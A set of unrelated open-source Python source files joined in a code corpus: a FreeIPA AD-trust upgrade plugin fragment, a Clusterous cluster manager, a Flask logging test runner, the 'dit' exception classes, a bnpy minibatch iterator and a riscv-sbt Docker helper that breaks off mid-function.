# an exception or it will abort the whole upgrade process
try:
trusts = ldap.get_entries(
base_dn=trusts_dn,
scope=ldap.SCOPE_ONELEVEL,
filter=self.trust_filter,
attrs_list=self.trust_attrs)
except errors.EmptyResult:
trusts = []
# For every trust, retrieve its principals and convert
for t_entry in trusts:
t_dn = t_entry.dn
logger.debug('Processing trust domain object %s', str(t_dn))
t_realm = t_entry.single_value.get('ipaNTTrustPartner').upper()
direction = int(t_entry.single_value.get('ipaNTTrustDirection'))
passwd_incoming = self.retrieve_trust_password(
ndr_unpack(drsblobs.trustAuthInOutBlob,
t_entry.single_value.get('ipaNTTrustAuthIncoming')))
passwd_outgoing = self.retrieve_trust_password(
ndr_unpack(drsblobs.trustAuthInOutBlob,
t_entry.single_value.get('ipaNTTrustAuthOutgoing')))
# For outbound and inbound trusts, process four principals total
if (direction & TRUST_BIDIRECTIONAL) == TRUST_BIDIRECTIONAL:
# 1. OUTBOUND: krbtgt/<REMOTE REALM>@<OUR REALM> must exist
trust_principal = self.tgt_principal_template.format(
remote=t_realm, local=self.api.env.realm)
try:
self.set_krb_principal(trust_principal,
passwd_outgoing,
t_dn,
flags=self.KRB_PRINC_CREATE_DEFAULT)
except errors.NotFound:
# It makes no sense to convert this one, skip the trust
# completely, better to re-establish one
logger.error(
"Broken trust to AD: %s not found, "
"please re-establish the trust to %s",
trust_principal, t_realm)
continue
# 2. Create <REMOTE FLATNAME$>@<OUR REALM>
nbt_name = t_entry.single_value.get('ipaNTFlatName')
nbt_principal = self.nbt_principal_template.format(
nbt=nbt_name, realm=self.api.env.realm)
tgt_principal = self.tgt_principal_template.format(
remote=nbt_name, local=self.api.env.realm)
self.set_krb_principal([nbt_principal, tgt_principal],
passwd_incoming,
t_dn,
flags=self.KRB_PRINC_CREATE_DEFAULT)
# 3. INBOUND: krbtgt/<OUR REALM>@<REMOTE REALM> must exist
trust_principal = self.tgt_principal_template.format(
remote=self.api.env.realm, local=t_realm)
try:
self.set_krb_principal(trust_principal, passwd_outgoing,
t_dn,
flags=self.KRB_PRINC_CREATE_DEFAULT)
except errors.NotFound:
# It makes no sense to convert this one, skip the trust
# completely, better to re-establish one
logger.error(
"Broken trust to AD: %s not found, "
"please re-establish the trust to %s",
trust_principal, t_realm)
continue
# 4. Create krbtgt/<OUR FLATNAME>@<REMOTE REALM>, disabled
nbt_principal = self.nbt_principal_template.format(
nbt=our_nbt_name, realm=t_realm)
tgt_principal = self.tgt_principal_template.format(
remote=our_nbt_name, local=t_realm)
self.set_krb_principal([tgt_principal, nbt_principal],
passwd_incoming,
t_dn,
flags=self.KRB_PRINC_CREATE_DEFAULT |
self.KRB_PRINC_CREATE_AGENT_PERMISSION |
self.KRB_PRINC_CREATE_DISABLED)
return False, []
KeyEntry = namedtuple('KeyEntry',
['kvno', 'principal', 'etype', 'key'])
@register()
class update_host_cifs_keytabs(Updater):
"""Synchronize host keytab and Samba keytab
Samba needs access to host/domain.controller principal keys to allow
validation of DCE RPC requests sent by domain members since those use a
service ticket to host/domain.controller principal because in Active
Directory service keys are the same as the machine account credentials
and services are just aliases to the machine account object.
"""
host_princ_template = "host/{master}@{realm}"
valid_etypes = ['aes256-cts-hmac-sha1-96', 'aes128-cts-hmac-sha1-96']
def extract_key_refs(self, keytab):
host_princ = self.host_princ_template.format(
master=self.api.env.host, realm=self.api.env.realm)
result = ipautil.run([paths.KLIST, "-eK", "-k", keytab],
capture_output=True, raiseonerr=False,
nolog_output=True)
if result.returncode != 0:
return None
keys_to_sync = []
for l in result.output.splitlines():
if (host_princ in l and any(e in l for e in self.valid_etypes)):
els = l.split()
els[-2] = els[-2].strip('()')
els[-1] = els[-1].strip('()')
keys_to_sync.append(KeyEntry._make(els))
return keys_to_sync
def copy_key(self, keytab, keyentry):
# keyentry.key is a hex value of the actual key
# prefixed with 0x, as produced by klist -K -k.
# However, ktutil accepts hex value without 0x, so
# we should strip first two characters.
stdin = dedent("""\
rkt {keytab}
addent -key -p {principal} -k {kvno} -e {etype}
{key}
wkt {keytab}
""").format(keytab=keytab, principal=keyentry.principal,
kvno=keyentry.kvno, etype=keyentry.etype,
key=keyentry.key[2:])
result = ipautil.run([paths.KTUTIL], stdin=stdin, raiseonerr=False,
umask=0o077, nolog_output=True)
if result.returncode != 0:
logger.warning('Unable to update %s with new keys', keytab)
def execute(self, **options):
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
# Extract keys from the host and samba keytabs
hostkeys = self.extract_key_refs(paths.KRB5_KEYTAB)
cifskeys = self.extract_key_refs(paths.SAMBA_KEYTAB)
if any([hostkeys is None, cifskeys is None]):
logger.warning('Either %s or %s are missing or unreadable',
paths.KRB5_KEYTAB, paths.SAMBA_KEYTAB)
return False, []
# If there are missing host keys in the samba keytab, copy them over
# Also copy those keys that differ in the content and/or KVNO
for hostkey in hostkeys:
copied = False
uptodate = False
for cifskey in cifskeys:
if all([cifskey.principal == hostkey.principal,
cifskey.etype == hostkey.etype]):
if any([cifskey.key != hostkey.key,
cifskey.kvno != hostkey.kvno]):
self.copy_key(paths.SAMBA_KEYTAB, hostkey)
copied = True
break
uptodate = True
if not (copied or uptodate):
self.copy_key(paths.SAMBA_KEYTAB, hostkey)
return False, []
@register()
class update_tdo_default_read_keys_permissions(Updater):
trust_filter = \
"(&(objectClass=krbPrincipal)(krbPrincipalName=krbtgt/{nbt}@*))"
def execute(self, **options):
ldap = self.api.Backend.ldap2
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
result = self.api.Command.trustconfig_show()['result']
our_nbt_name = result.get('ipantflatname', [None])[0]
if not our_nbt_name:
return False, []
trusts_dn = self.api.env.container_adtrusts + self.api.env.basedn
trust_filter = self.trust_filter.format(nbt=our_nbt_name)
# We might be in a situation when no trusts exist yet
# In such case there is nothing to upgrade but we have to catch
# an exception or it will abort the whole upgrade process
try:
tdos = ldap.get_entries(
base_dn=trusts_dn,
scope=ldap.SCOPE_SUBTREE,
filter=trust_filter,
attrs_list=['*'])
except errors.EmptyResult:
tdos = []
for tdo in tdos:
updates = dict()
oc = tdo.get('objectClass', [])
if 'ipaAllowedOperations' not in oc:
updates['objectClass'] = oc + ['ipaAllowedOperations']
read_keys = tdo.get('ipaAllowedToPerform;read_keys', [])
if not read_keys:
read_keys_values = list(map(
lambda x: x.format(basedn=self.api.env.basedn),
trust_read_keys_template))
updates['ipaAllowedToPerform;read_keys'] = read_keys_values
tdo.update(updates)
try:
ldap.update_entry(tdo)
except errors.EmptyModlist:
logger.debug("No update was required for TDO %s",
tdo.single_value.get('krbCanonicalName'))
return False, []
@register()
class update_adtrust_agents_members(Updater):
""" Ensure that each adtrust agent is a member of the adtrust agents group
cn=adtrust agents,cn=sysaccounts,cn=etc,$BASEDN must contain:
- member: krbprincipalname=cifs/master@realm,cn=services,cn=accounts,base
- member: fqdn=master,cn=computers,cn=accounts,base
"""
def execute(self, **options):
ldap = self.api.Backend.ldap2
# First, see if trusts are enabled on the server
if not self.api.Command.adtrust_is_enabled()['result']:
logger.debug('AD Trusts are not enabled on this server')
return False, []
agents_dn = DN(
('cn', 'adtrust agents'), self.api.env.container_sysaccounts,
self.api.env.basedn)
try:
agents_entry = ldap.get_entry(agents_dn, ['member'])
except errors.NotFound:
logger.error("No adtrust agents group found")
return False, []
# Build a list of agents from the cifs/.. members
agents_list = []
members = agents_entry.get('member', [])
suffix = '@{}'.format(self.api.env.realm).lower()
for amember in members:
if amember[0].attr.lower() == 'krbprincipalname':
# Extract krbprincipalname=cifs/hostname@realm from the DN
value = amember[0].value
if (value.lower().startswith('cifs/') and
value.lower().endswith(suffix)):
# 5 = length of 'cifs/'
hostname = value[5:-len(suffix)]
agents_list.append(DN(('fqdn', hostname),
self.api.env.container_host,
self.api.env.basedn))
# Add the fqdn=hostname... to the group
service.add_principals_to_group(
ldap,
agents_dn,
"member",
agents_list)
return False, []
| encukou/freeipa | ipaserver/install/plugins/adtrust.py | Python | gpl-3.0 | 37,987 |
# Copyright 2015 Nicta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
import os
import sys
import logging
import logging.config
import re
import boto
import defaults
import cluster
import clusterbuilder
from environmentfile import EnvironmentFile
import environmentfile
import clusterousconfig
import environment
import helpers
from helpers import SchemaEntry
class FileError(Exception):
def __init__(self, message, filename=''):
super(FileError, self).__init__(message)
self.filename = filename
class ConfigError(FileError):
pass
class EnvironmentFileError(FileError):
pass
class NoWorkingClusterError(Exception):
pass
class ProfileError(Exception):
pass
class ClusterError(Exception):
pass
class Clusterous(object):
"""
Clusterous application
"""
def __init__(self, config, config_type):
self.clusters = []
self._config = {}
self._cluster_class = None
self._logger = logging.getLogger(__name__)
self._config = config
self._cluster_class = cluster.get_cluster_class(config_type)
conf_dir = os.path.expanduser(defaults.local_config_dir)
if not os.path.exists(conf_dir):
os.makedirs(conf_dir)
def _read_profile(self, profile_file):
"""
Given user supplied file path, read in and validate profile file.
Return dictionary contents
"""
full_path = os.path.abspath(os.path.expanduser(profile_file))
if not os.path.isfile(full_path):
raise ProfileError('Cannot open file "{0}"'.format(profile_file))
stream = open(full_path, 'r')
try:
contents = yaml.load(stream)
except yaml.YAMLError as e:
raise ProfileError('Invalid YAML format {0}'.format(e))
main_schema = {
'cluster_name': SchemaEntry(True, None, str, None),
'controller_instance_type': SchemaEntry(False, '', str, None),
'shared_volume_size': SchemaEntry(False, 0, int, None),
'central_logging_level': SchemaEntry(False, 0, int, None),
'environment_file': SchemaEntry(False, '', str, None),
'shared_volume_id': SchemaEntry(False, '', str, None),
'parameters': SchemaEntry(True, {}, dict, None)
}
# Validate profile file
is_valid, message, validated = helpers.validate(contents, main_schema)
if not is_valid:
raise ProfileError(message)
if not defaults.taggable_name_re.match(validated['cluster_name']):
raise ProfileError('Unsupported characters in cluster_name "{0}"'.format(validated['cluster_name']))
if len(validated['cluster_name']) > defaults.taggable_name_max_length:
raise ProfileError('"cluster_name" cannot be more than {0} characters'.format(defaults.taggable_name_max_length))
if not 0 <= validated['central_logging_level'] <= 2:
raise ProfileError('"central_logging_level" must be either 0, 1 or 2')
if validated['shared_volume_size'] < 0:
raise ProfileError('"shared_volume_size" cannot be negative')
return validated
def make_cluster_object(self, cluster_name=None, cluster_name_required=True, cluster_must_be_running=True):
if not (self._cluster_class and self._config):
return None
else:
success, message = self._cluster_class.validate_config(self._config)
if not success:
raise ConfigError('Error in configuration: ' + message)
try:
return self._cluster_class(self._config, cluster_name, cluster_name_required, cluster_must_be_running)
except cluster.ClusterException as e:
raise ClusterError(e)
except cluster.ClusterInitException as e:
raise NoWorkingClusterError(e)
def create_cluster(self, profile_file, launch_env=True):
"""
Create a new cluster from profile file
"""
profile = self._read_profile(profile_file)
env_file = None
cluster_spec = None
try:
if profile['environment_file']:
env_file = EnvironmentFile(profile['environment_file'], profile['parameters'], profile_file)
# If necessary, obtain cluster spec
if not env_file or (not env_file.spec['cluster']):
default_file_path = defaults.get_script(defaults.default_cluster_def_filename)
cluster_env_file = EnvironmentFile(default_file_path, profile['parameters'])
cluster_spec = cluster_env_file.spec['cluster']
else:
cluster_spec = env_file.spec['cluster']
except environmentfile.UnknownValue as e:
# If unknown value found, probably an error in the profile (i.e. user params)
raise ProfileError(str(e))
except environmentfile.UnknownParams as e:
# If the profile file includes param not recognised
raise ProfileError(str(e))
except environmentfile.EnvironmentSpecError as e:
# Otherwise it's a problem in the environment file itself
raise EnvironmentFileError(str(e), filename=profile['environment_file'])
except cluster.ClusterException as e:
raise ClusterError(e)
self._logger.debug('Actual cluster spec: {0}'.format(cluster_spec))
# Init Cluster object
cl = self.make_cluster_object(cluster_name_required=False, cluster_must_be_running=False)
builder = clusterbuilder.ClusterBuilder(cl)
self._logger.info('Creating cluster...')
created = builder.create_cluster(profile['cluster_name'], cluster_spec, profile['central_logging_level'],
profile['shared_volume_size'], profile['controller_instance_type'], profile['shared_volume_id'])
if not created:
return False, ''
self._logger.info('Cluster "{0}" created'.format(profile['cluster_name']))
message = ''
# Run environment if environment file is available
if env_file:
self._logger.info('Running environment...')
try:
env = environment.Environment(cl)
# Run environment (but wait 10 seconds for Mesos to init)
success, message = env.launch_from_spec(env_file, 10)
self._logger.info('Environment is running')
except environment.Environment.LaunchError as e:
self._logger.error(e)
self._logger.error('Failed to run environment')
return False, message
return True, message
def run_environment(self, environment_file):
cl = self.make_cluster_object()
try:
env_file = EnvironmentFile(environment_file)
env = environment.Environment(cl)
success, message = env.launch_from_spec(env_file)
except environmentfile.EnvironmentSpecError as e:
raise EnvironmentFileError(e, filename=environment_file)
except environment.Environment.LaunchError as e:
self._logger.error(e)
self._logger.error('Failed to run environment')
return False, ''
return success, message
def quit_environment(self, tunnel_only=False):
cl = self.make_cluster_object()
success = True
if not tunnel_only:
# Quit running apps
env = environment.Environment(cl)
success &= env.destroy()
else:
self._logger.info('Only removing any local SSH tunnels')
success &= cl.delete_all_permanent_tunnels()
return success
def scale_nodes(self, action, num_nodes, node_name):
cl = self.make_cluster_object()
builder = clusterbuilder.ClusterBuilder(cl)
delta = num_nodes
actual_node_name = node_name
if action == 'add':
success, message, actual_node_name = builder.add_nodes(num_nodes, node_name)
elif action == 'rm':
success, message, actual_node_name = builder.rm_nodes(num_nodes, node_name)
delta = -num_nodes
else:
raise ValueError('action must be either "add" or "rm"')
env = environment.Environment(cl)
if success and env.get_running_component_info():
self._logger.info('Scaling running environment')
success, message = env.scale_app(actual_node_name, delta, wait_time=60)
return success, message
def docker_build_image(self, args):
"""
Create a new docker image
"""
full_path = os.path.abspath(args.dockerfile_folder)
if not os.path.isdir(full_path):
self._logger.error("Error: Folder '{0}' does not exists.".format(full_path))
return False
if not os.path.exists("{0}/Dockerfile".format(full_path)):
self._logger.error("Error: Folder '{0}' does not have a Dockerfile.".format(full_path))
return False
cl = self.make_cluster_object()
cl.docker_build_image(full_path, args.image_name)
def docker_image_info(self, image_name):
"""
Gets information of a Docker image
"""
cl = self.make_cluster_object()
return cl.docker_image_info(image_name)
def sync_put(self, local_path, remote_path):
"""
Sync local folder to the cluster
"""
cl = self.make_cluster_object()
return cl.sync_put(local_path, remote_path)
def sync_get(self, local_path, remote_path):
"""
Sync folder from the cluster to local
"""
cl = self.make_cluster_object()
return cl.sync_get(local_path, remote_path)
def ls(self, remote_path):
"""
List content of a folder on the on cluster
"""
cl = self.make_cluster_object()
return cl.ls(remote_path)
def rm(self, remote_path):
"""
Delete content of a folder on the on cluster
"""
cl = self.make_cluster_object()
return cl.rm(remote_path)
def connect_to_container(self, component_name):
# Check if component_name exists
cl = self.make_cluster_object()
env = environment.Environment(cl)
running_apps = env.get_running_component_info()
app = running_apps.get(component_name)
if app is None:
message = "Component '{0}' does not exist".format(component_name)
return (False, message)
if app > 1:
message = "Cannot connect to '{0}' because there is more than one instance running on the cluster".format(component_name)
return (False, message)
return cl.connect_to_container(component_name)
def central_logging(self):
cl = self.make_cluster_object()
return cl.connect_to_central_logging()
def cluster_status(self):
cl = self.make_cluster_object()
env = environment.Environment(cl)
info = cl.get_cluster_info()
component_info = env.get_running_components_by_node()
# Fill in information about running components
for node in info.get('nodes', {}):
components = []
for c in component_info.get(node, []):
component = {}
component['name'] = c.get('app_id', '').strip('/')
component['count'] = c.get('instance_count', 0)
components.append(component)
info['nodes'][node]['components'] = components
# Add information about shared volume usage
info['shared_volume'] = cl.get_shared_volume_usage_info()
return True, info
def workon(self, cluster_name):
"""
Sets a working cluster
"""
cl = self.make_cluster_object(cluster_name, cluster_must_be_running=False)
success = cl.workon()
if success:
message = 'Switched to {0}'.format(cluster_name)
else:
message = 'Could not switch to cluster {0}'.format(cluster_name)
return success, message
def destroy_cluster(self, leave_shared_volume, force_delete_shared_volume):
cl = self.make_cluster_object(cluster_must_be_running=False)
self._logger.info('Destroying cluster {0}'.format(cl.cluster_name))
cl.terminate_cluster(leave_shared_volume, force_delete_shared_volume)
def ls_volumes(self):
"""
List available shared volumes left behind from destroyed cluster
"""
cl = self.make_cluster_object(cluster_name_required=False, cluster_must_be_running=False)
return (True, cl.ls_volumes())
def rm_volume(self, volume_id):
"""
Deletes a shared volume left behind from destroyed cluster
"""
cl = self.make_cluster_object(cluster_name_required=False, cluster_must_be_running=False)
return cl.rm_volume(volume_id)
| sirca/clusterous | clusterous/clusterousmain.py | Python | apache-2.0 | 13,510 |
"""Runner for testing app and blueprint logging individually"""
import subprocess
from tests.samples import app
if __name__ == '__main__':
app.run()
subprocess.call(['rm', '-rf', 'logs'])
| pinntech/flask-logex | runner.py | Python | mit | 198 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Information Theory Exceptions
=============================
Exceptions related to information theory.
"""
__all__ = ['ditException',
'IncompatibleDistribution',
'InvalidBase',
'InvalidDistribution',
'InvalidNormalization',
'InvalidOutcome',
'InvalidProbability']
class ditException(Exception):
"""
Base class for all `dit` exceptions.
"""
def __init__(self, *args, **kwargs):
if 'msg' in kwargs:
# Override the message in the first argument.
self.msg = kwargs['msg']
elif args:
self.msg = args[0]
else:
self.msg = ''
self.args = args
self.kwargs = kwargs
def __str__(self):
return self.msg
def __repr__(self):
return "{0}{1}".format(self.__class__.__name__, repr(self.args))
class IncompatibleDistribution(ditException):
"""
Exception for an incompatible distribution.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the exception.
"""
msg = "The distribution is not compatible."
args = (msg,) + args
ditException.__init__(self, *args, **kwargs)
class InvalidBase(ditException):
"""
Exception for an invalid logarithm base.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the exception.
Parameters
----------
base : float
The invalid base.
"""
if args:
msg = "{0} is not a valid logarithm base.".format(args[0])
args = (msg,) + args
ditException.__init__(self, *args, **kwargs)
class InvalidDistribution(ditException):
"""
Exception thrown for an invalid distribution.
"""
pass
class InvalidOutcome(ditException):
"""
Exception for an invalid outcome.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the exception.
Parameters
----------
outcome : sequence
The invalid outcomes.
single : bool
Specifies whether `outcome` represents a single outcome or not.
"""
single = kwargs.get('single', True)
try:
bad = args[0]
except IndexError:
# Demand a custom message.
if 'msg' in kwargs:
msg = kwargs['msg']
else:
msg = ''
else:
if single:
msg = "Outcome {0!r} is not in the sample space.".format(bad)
else:
msg = "Outcomes {0} are not in the sample space.".format(bad)
args = (msg,) + args
ditException.__init__(self, *args, **kwargs)
class InvalidNormalization(ditException):
"""
Exception thrown when a distribution is not normalized.
"""
def __init__(self, *args, **kwargs):
"""
Initializes the exception.
The sole argument should be the summation of the probabilities.
"""
msg = "Bad normalization: {0!r}".format(args[0])
self.summation = args[0]
args = (msg,) + args
ditException.__init__(self, *args, **kwargs)
class InvalidProbability(ditException):
"""
Exception thrown when a probability is not in [0,1].
"""
def __init__(self, *args, **kwargs):
"""
Initialize the exception.
Parameters
----------
p : float | sequence
The invalid probability.
ops : operations
The operation handler for the incoming probabilities.
"""
ops = kwargs['ops']
bounds = "[{0}, {1}]".format(ops.zero, ops.one)
prob = args[0]
if len(args[0]) == 1:
msg = "Probability {0} is not in {1} (base: {2!r})."
else:
prob = list(prob)
msg = "Probabilities {0} are not in {1} (base: {2!r})."
msg = msg.format(prob, bounds, ops.base)
args = (msg,) + args
ditException.__init__(self, *args, **kwargs)
| chebee7i/dit | dit/exceptions.py | Python | bsd-3-clause | 4,115 |
'''
MinibatchIterator.py
Generic object for iterating over a single bnpy Data set
by considering one subset minibatch (often just called a batch) at a time
Usage
--------
Construct by providing the underlying full-dataset
>> MB = MinibatchIterator(Data, nBatch=10, nObsBatch=100)
Then call
has_next_batch() to test if more data is available
get_next_batch() to get the next batch (as a Data object)
Batches are defined via a random partition of all data items
e.g. for 100 items split into 20 batches
batch 1 : items 5, 22, 44, 30, 92
batch 2 : items 93, 33, 46, 12, 78,
etc.
Supports multiple laps through the data. Specify # of laps with parameter nLap.
Traversal order of the batch is randomized every lap through the full dataset
Set the "dataorderseed" parameter to get repeatable orders.
Attributes
-------
nBatch : number of batches to divide full dataset into
nObsBatch : number of observations in each batch (on average)
nObsTotal : number of observations in entire full dataset
nLap : number of times to pass thru all batches in dataset during iteration
batchID : exact integer ID of the current batch. range=[0, nBatch-1]
curLapPos : integer count of current position in batch order. incremented 1 at a time.
lapID : integer ID of the current lap
'''
import numpy as np
MAXSEED = 1000000
class MinibatchIterator(object):
def __init__(self, Data, nBatch=10, nObsBatch=None, nLap=10, dataorderseed=42, startLap=0, **kwargs):
''' Constructor for creating an iterator over the batches of data
'''
self.Data = Data
self.nBatch = nBatch
self.nLap = nLap + startLap
self.nObsTotal = Data.nObsTotal
if nObsBatch is None:
self.nObsBatch = Data.nObsTotal/nBatch
else:
self.nObsBatch = nObsBatch
# Config order in which batches are traversed
self.curLapPos = -1
self.lapID = startLap
self.dataorderseed = int(int(dataorderseed) % MAXSEED)
# Make list with entry for every distinct batch
# where each entry is itself a list of obsIDs in the full dataset
self.obsIDByBatch = self.configObsIDsForEachBatch()
######################################################### accessor methods
#########################################################
def has_next_batch( self ):
if self.lapID >= self.nLap:
return False
if self.lapID == self.nLap - 1:
if self.curLapPos == self.nBatch - 1:
return False
return True
def get_next_batch( self ):
''' Returns DataObj of the next batch
'''
if not self.has_next_batch():
raise StopIteration()
self.curLapPos += 1
if self.curLapPos >= self.nBatch:
self.curLapPos = 0
self.lapID += 1
# Create the DataObj for the current batch
self.batchOrderCurLap = self.get_rand_order_for_batchIDs_current_lap()
self.batchID = self.batchOrderCurLap[self.curLapPos]
obsIDsCurBatch = self.obsIDByBatch[self.batchID]
bData = self.Data.select_subset_by_mask(obsIDsCurBatch)
return bData
def getObsIDsForCurrentBatch(self):
return self.obsIDByBatch[self.batchOrderCurLap[self.curLapPos]]
######################################################### internal methods
#########################################################
def configObsIDsForEachBatch(self):
''' Assign each observation in dataset to a batch by random permutation
Returns
--------
obsIDByBatch : list of length self.nBatch,
where obsIDByBatch[bID] : list of all obsIDs in batch bID
'''
PRNG = np.random.RandomState(self.dataorderseed)
obsIDs = PRNG.permutation(self.Data.nObsTotal).tolist()
obsIDByBatch = dict()
for batchID in range(self.nBatch-1):
obsIDByBatch[batchID] = obsIDs[:self.nObsBatch]
del obsIDs[:self.nObsBatch]
# Last batch gets leftovers, may be bigger
obsIDByBatch[self.nBatch-1] = obsIDs
return obsIDByBatch
def get_rand_order_for_batchIDs_current_lap(self):
''' Returns array of batchIDs, permuted in random order
Order changes each time we traverse all items (each lap)
'''
curseed = int(self.dataorderseed + self.lapID)
PRNG = np.random.RandomState(curseed)
return PRNG.permutation(self.nBatch)
######################################################### I/O methods
#########################################################
def get_text_summary(self):
''' Returns string with human-readable description of this dataset
e.g. source, author/creator, etc.
'''
if hasattr(self, 'summary'):
return self.summary
return 'Minibatch Iterator: %d batches' % (self.nBatch)
def summarize_num_observations(self):
s = ' num batch %d, num obs per batch %d\n' % (self.nBatch, self.nObsBatch)
s += ' num obs (total across all batches): %d' % (self.Data.nObsTotal)
return s
| daeilkim/refinery | refinery/bnpy/bnpy-dev/bnpy/data/MinibatchIterator.py | Python | mit | 4,947 |
#!/usr/bin/env python3
from auto.utils import cat, cd, mkdir_if_needed, mpath, path, shell
import argparse
import re
import os
import sys
TOPDIR = os.environ["TOPDIR"]
DOCKER_DIR = path(TOPDIR, "docker")
#
# Helper
#
class Helper:
@staticmethod
def is_cygwin():
try:
shell("uname | grep -i cygwin >/dev/null", quiet=True)
return True
except:
return False
@staticmethod
def cygpath(path):
if Helper.is_cygwin():
return shell("cygpath -m " + path, save_out=True).strip()
else:
return path
@staticmethod
def clean_imgs():
# remove all container instances
containers = shell("docker ps -a | awk '{print$1}' | sed 1d",
save_out=True).split()
if len(containers) > 0:
shell("docker rm " + " ".join(containers))
# remove all '<none>' and 'sbt' images
images = shell(
"docker images | grep -e sbt -e '<none>' | awk '{print$3}'",
save_out=True).split()
if len(images) > 0:
shell("docker rmi " + " ".join(images))
#
# Volumes
#
class Volume:
def __init__(self, name, vol_name, mount_point):
self.name = name
self.vol_name = vol_name
self.mount_point = mount_point
def create(self):
# create volume if needed
try:
shell("docker volume ls | grep " + self.vol_name + " >/dev/null",
quiet=True)
except:
shell("docker volume create " + self.vol_name)
def volstr(self):
return "--mount type=volume,source={},destination={}".format(
self.vol_name, self.mount_point)
class Volumes:
def __init__(self):
self.vols = {
"build":
Volume("build", "sbt-vol-build", "/riscv-sbt/build"),
"toolchain":
Volume("toolchain", "sbt-vol-toolchain", "/riscv-sbt/toolchain")
}
def __getitem__(self, key):
return self.vols[key]
def volstr(self):
vstr = ''
for k, v in self.vols.items():
vstr = cat(vstr, v.volstr())
return vstr
VOLS = Volumes()
#
# Docker
#
class Docker:
BIND = True
def __init__(self, name, img):
self.name = name
self.img = img
def cmd(self, dcmd, cmd, interactive, vols=None):
if Helper.is_cygwin():
prefix = "winpty "
else:
prefix = ''
privileged = True
make_opts = os.getenv("MAKE_OPTS")
if make_opts:
env = "MAKE_OPTS=" + make_opts
else:
env = None
fmtdata = {
"prefix": prefix if interactive else "",
"dcmd": dcmd,
"privileged": " --privileged" if privileged else "",
"interactive": " -it" if interactive else "",
"rm": " --rm" if dcmd == "run" else "",
"hostname": " -h dev" if dcmd == "run" else "",
"name": " --name " + self.name if dcmd == "run" else "",
"vols": " " + vols if vols else "",
"img": " " + self.img,
"cmd": " " + cmd if cmd else "",
"env": " -e " + env if env and dcmd == "run" else "",
}
shell(("{prefix}docker {dcmd}" +
"{privileged}{interactive}{rm}{hostname}{name}{vols}{env}{img}{cmd}"
).format(**fmtdata))
def run(self, cmd=None, interactive=False):
self.cmd("run", cmd, interactive, vols=Docker.volstr(Docker.BIND))
def exec(self, cmd, interactive=True):
self.cmd("exec", cmd, interactive)
@staticmethod
def volstr(bind):
src = Helper.cygpath(TOPDIR)
dst = "/riscv-sbt"
bmount = "--mount type=bind,source={},destination={}"
vstr = bmount.format(src, dst)
if bind:
vstr = cat(vstr,
bmount.format(path(src, "toolchain"), path(dst, "toolchain")))
else:
vstr = cat(vstr, VOLS.volstr())
return vstr
#
# Commits
#
# module + commit_hash
class Commit:
def __init__(self, module, commit):
self.module = module
self.commit = commit
class Commits:
def __init__(self, topdir, docker_dir):
self.topdir = topdir
self.commits_txt = path(docker_dir, "commits.txt")
# get current commit hashes
def get_current(self):
commits = []
with cd(self.topdir):
# get submodules
out = shell("git submodule", save_out=True)
lines = out.split("\n")
patt = re.compile("[ -]*([^ ]+) +submodules/([^ ]+) *")
for l in lines:
if l.find("lowrisc-llvm") >= 0:
continue
r = re.match(patt, l)
if r:
commit = r.group(1)
module = r.group(2)
commits.append(Commit(module, commit))
# add sbt
commits.append(Commit("riscv-sbt",
shell("git rev-parse HEAD", save_out=True)
.format(self.topdir)
.strip()))
return commits
# save to file
def save(self, commits):
with open(self.commits_txt, "w") as f:
for commit in commits:
f.write("{} {}\n".format(commit.module, commit.commit))
# load from file
def load(self):
self.commits = {}
with open(self.commits_txt, "r") as f:
patt = re.compile("([^ ]+) ([^ ]+)")
for line in f:
r = re.match(patt, line)
self.commits[r.group(1)] = r.group(2)
return self
def __getitem__(self, key):
return self.commits[key]
#
# Sources
#
# source package
class Source:
def __init__(self, name, url, dir=None, clone_flags=None):
self.name = name
if dir == "top":
self.dstdir = TOPDIR
self.parent_dir = None
else:
self.parent_dir = path(TOPDIR, "submodules")
self.dstdir = path(self.parent_dir, name)
self.url = url
self.clone_flags = clone_flags
self.update = True
def get(self):
if not os.path.exists(self.dstdir):
mkdir_if_needed(self.parent_dir)
with cd(self.parent_dir):
cmd = cat("git clone", self.clone_flags, self.url)
shell(cmd)
elif self.update:
with cd(self.dstdir):
shell("git fetch")
with cd(self.dstdir):
shell((
"if [ `git rev-parse HEAD` != {0} ]; then " +
"git checkout {0}; fi").format(self.commit.strip()))
class Sources:
def __init__(self):
self.srcs = [
Source("riscv-sbt",
"https://github.com/OpenISA/riscv-sbt.git",
dir="top"),
Source("riscv-gnu-toolchain",
"https://github.com/riscv/riscv-gnu-toolchain",
clone_flags="--recursive"),
Source("llvm",
"https://github.com/OpenISA/llvm",
clone_flags="--recursive -b lowrisc"),
Source("clang",
"https://github.com/OpenISA/clang",
clone_flags="--recursive -b lowrisc"),
Source("riscv-fesvr",
"https://github.com/riscv/riscv-fesvr",
clone_flags="--recursive"),
Source("riscv-pk",
"https://github.com/riscv/riscv-pk",
clone_flags="--recursive"),
Source("riscv-isa-sim",
"https://github.com/riscv/riscv-isa-sim",
clone_flags="--recursive"),
Source("riscv-qemu-tests",
"https://github.com/arsv/riscv-qemu-tests",
clone_flags="--recursive")
]
commits = Commits(TOPDIR, DOCKER_DIR)
commits.load()
# set commits
for src in self.srcs:
src.commit = commits[src.name]
# get all sources
def get(self):
for src in self.srcs:
src.get()
#
# Images
#
class Image:
commits = Commits(TOPDIR, DOCKER_DIR).load()
def __init__(self, name, img=None):
self.name = name
if not img:
self.img = "sbt-" + name
else:
self.img = img
# build if done file does not exist
def build(self, force):
dir = path(DOCKER_DIR, self.name)
done = path(dir, "done")
# skip if done
if not force and os.path.exists(done):
return
# docker build
with cd(DOCKER_DIR):
shell("docker build -t {} {}".format(
self.img, self.name))
self._build()
shell("touch " + done)
def _build(self):
name = self.name
docker = Docker(name, self.img)
if name == "riscv-sbt":
pass
elif name == "riscv-gnu-toolchain":
